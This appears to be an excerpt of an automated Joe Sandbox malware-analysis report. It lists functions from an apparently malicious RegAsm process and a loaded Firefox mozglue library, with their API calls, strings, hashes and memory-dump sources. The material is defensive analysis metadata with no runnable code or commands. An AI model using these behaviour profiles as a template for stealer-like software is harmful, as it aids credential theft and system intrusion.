                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                                                                  • API String ID: 396451647-2783943728
                                                                                                                                                                                                                                                                                                  • Opcode ID: 55bc6476c9bf4e35ced4e892adc0158bd104a748e4d6b78799d9d1208076cabf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 65e252990ab53e992fbd07aa9c3af4436ef45ca0640361b11d234a145f12ec97
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55bc6476c9bf4e35ced4e892adc0158bd104a748e4d6b78799d9d1208076cabf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD31C3B2900219ABDB10DF94DC85FEFB77DEB09710F10452AFA05A3190E7386E44CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004141E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041420E
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041421A
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041422F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004142D1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004142DE
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004142F0
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00414301
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                                                                  • API String ID: 1943017432-4251816714
                                                                                                                                                                                                                                                                                                  • Opcode ID: 12d4fcf619e82c39dceeb86a7a4117807dc793819e8c36f20c6a740e4283e52b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 678fd8f5fc3634fe003e453cba7f0c388322c14891f679c78b158768d5c631dd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12d4fcf619e82c39dceeb86a7a4117807dc793819e8c36f20c6a740e4283e52b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA3154B1C00248EBD714EFE5CC81EDEB7B9AB19304F40416EF605B7181DB785A49CB64
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410BB0 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 00410BCA
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00410BD5
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410BE0
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00410BEB
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000), ref: 00410BF8
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000,?), ref: 00410BFF
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410C0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %dx%d
                                                                                                                                                                                                                                                                                                  • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                                                                  • Opcode ID: dc66decae07814dc11c4117faf6020aec9e0522b32d48f8d1c27e65cdf2aeac4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28a443ccca6aafef8e103660202004194f8b9ab8a3b23b210e6d3760195870f7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc66decae07814dc11c4117faf6020aec9e0522b32d48f8d1c27e65cdf2aeac4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50018132740224BBE3202BE9AC0EF5A7A9DEB0AB52F001055FB05E72D0D6B51C0087E9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C803E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL ref: 6C803EEE
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C803FDC
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL ref: 6C804006
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8040A1
                                                                                                                                                                                                                                                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C803CCC), ref: 6C8040AF
                                                                                                                                                                                                                                                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C803CCC), ref: 6C8040C2
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C804134
                                                                                                                                                                                                                                                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C803CCC), ref: 6C804143
                                                                                                                                                                                                                                                                                                  • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C803CCC), ref: 6C804157
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3680524765-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7e7a29fc2a12b16af7d6c006225b6f036d2e8b1a632cc88154a74848677a78d8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BA1A1B1B40205CFDB60CF69CA80659B7B5FF98308F2549A9D909AF712D771EC46CBA0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C849D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C848273), ref: 6C849D65
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(6C848273,?), ref: 6C849D7C
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?), ref: 6C849D92
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C849E0F
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(6C84946B,?,?), ref: 6C849E24
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?), ref: 6C849E3A
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C849EC8
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(6C84946B,?,?,?), ref: 6C849EDF
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?), ref: 6C849EF5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 956590011-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a1260c633bea4c0d1dbb884e7fb64d2e4c960c991dfc50227bd25e31b24b17ed
                                                                                                                                                                                                                                                                                                  • Instruction ID: 10824e066cacae98cca4415f3281c30d66be9a483d6d33f71c551ec4f8d30fbd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1260c633bea4c0d1dbb884e7fb64d2e4c960c991dfc50227bd25e31b24b17ed
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB7190B0909B458BD722CF18C64095BF7F4FF99315B449A29E85A5BB01EB30E8C5CB81
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C84DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C84DDCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C82FA4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DE0D
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C84DE41
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DE5F
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DEA3
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DEE9
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C83DEFD,?,6C804A68), ref: 6C84DF32
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C84DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C84DB86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C84DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C84DC0E
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C83DEFD,?,6C804A68), ref: 6C84DF65
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C84DF80
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1789f98afba99b9dbb6a79318dea9c97cb891e5f8b195ddf0cad116e95aad6a6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 65c5d158e8a329585fe3c6985b64cf423522e8eb08aaf3224941f696d5739ea3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1789f98afba99b9dbb6a79318dea9c97cb891e5f8b195ddf0cad116e95aad6a6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB51D9726017199BD7318B18CA846AEB3B2BF91308F958D2ED41A53F01D731F859CBD2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C855D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D32
                                                                                                                                                                                                                                                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D62
                                                                                                                                                                                                                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D6D
                                                                                                                                                                                                                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D84
                                                                                                                                                                                                                                                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855DA4
                                                                                                                                                                                                                                                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855DC9
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6C855DDB
                                                                                                                                                                                                                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855E00
                                                                                                                                                                                                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855E45
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f65dcf664c688a7a1777e43fd3048c4b366a97dba95860472940bc01b6c4288c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7cf968396c557355b88fcf2b6aa221f1826dd87db8ca87c5f0fee940fa24735e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f65dcf664c688a7a1777e43fd3048c4b366a97dba95860472940bc01b6c4288c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40418F317003148FCB20DF69CA9CAAE7BB6EF89319F544479E50697781EB74E805CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C82CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7F31A7), ref: 6C82CDDD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                                  • Opcode ID: 46f157891ab0e1ce19ac086bf8f40401516e40b046e92fcc04c97f09d2d60350
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c31b2e199f2514a380b30eb06fd54b1a8761329cc082a4e8c3145be9c9b6a03
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46f157891ab0e1ce19ac086bf8f40401516e40b046e92fcc04c97f09d2d60350
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0131E8317402155BFB30AEA5CE4DBBE7776AB41758F204825F514AB781E7B4D440C7E1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7FECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: LoadLibraryW.KERNEL32(shell32,?,6C86D020), ref: 6C7FF122
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7FF132
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000012), ref: 6C7FED50
                                                                                                                                                                                                                                                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FEDAC
                                                                                                                                                                                                                                                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C7FEDCC
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C7FEE08
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7FEE27
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C7FEE32
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C7FEBB5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C82D7F3), ref: 6C7FEBC3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C82D7F3), ref: 6C7FEBD6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C7FEDC1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
